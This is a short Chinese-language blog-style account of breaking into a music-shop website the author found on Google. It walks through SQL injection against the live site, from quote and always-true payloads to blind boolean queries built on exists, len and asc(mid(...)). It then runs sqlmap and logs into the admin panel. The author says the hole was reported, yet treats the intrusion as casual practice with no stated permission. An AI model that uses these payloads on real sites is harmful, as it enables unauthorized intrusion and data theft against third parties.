●漏洞已提交
■重要細節全部打碼
■部分細節對外開放
■本次入侵不對網站資料庫進行任何更改

google上找到一個琴行網站
①判斷sql注入
注入單引號’
報錯"商品已下架"
改注入條件，網站後加上’ or ‘1’='1
先注入永真條件
報錯"商品已下架"，並且不爆出具體錯誤
那麼更改永真語句 %'or 1=1
仍然不返回正常網頁，繼續更改
or 1=1

網頁正常返回並爆出該表下所有資料

●判斷：存在sql注入點

②判斷magic_quotes_gpc
這個很簡單，只要向網站注入 and ‘1’=‘1’就好
如果gpc開啟，單引號就會被轉義為’，導致返回頁面不正常，這裡網站gpc並沒有開啟，這就好辦了
●gpc不開啟

③判斷customErrors是否開啟
根據上面的注入過程，網站並不爆詳細錯誤，但是有注入點，所以我收集不到它的具體網站資料庫名稱
●customErrors開啟，並且轉跳到"商品已下架"介面

④開始盲注
因為不返回具體資訊，所以having 1=1的方法就報廢了
所以盲注檢測資料庫
and exists(select * from 表名)
這個方法判斷當前資料庫下是否有此表
and (select count(欄位) from 表名)
判斷此表名下是否有某欄位
and (select top 1 len (欄位) from 表名)>數字
判斷該列的欄位長度是否大於某個數
and (select top 1 asc (mid (欄位,位數,1)) from 表名) >ascii（1~128）
判斷欄位的ascii碼
比如and (select top 1 asc (mid (欄位,位數,1)) from 表名) >96
如果返回正常，而97返回不正常那麼該欄位的某位數的ascii碼為97，查詢ascii碼錶，此字為a
接著一個個猜就行，不過我可沒這耐心，我直接用sqlmap跑出欄位了

成功登入網站管理介面
此處入侵沒有什麼技術含量，純粹練練手感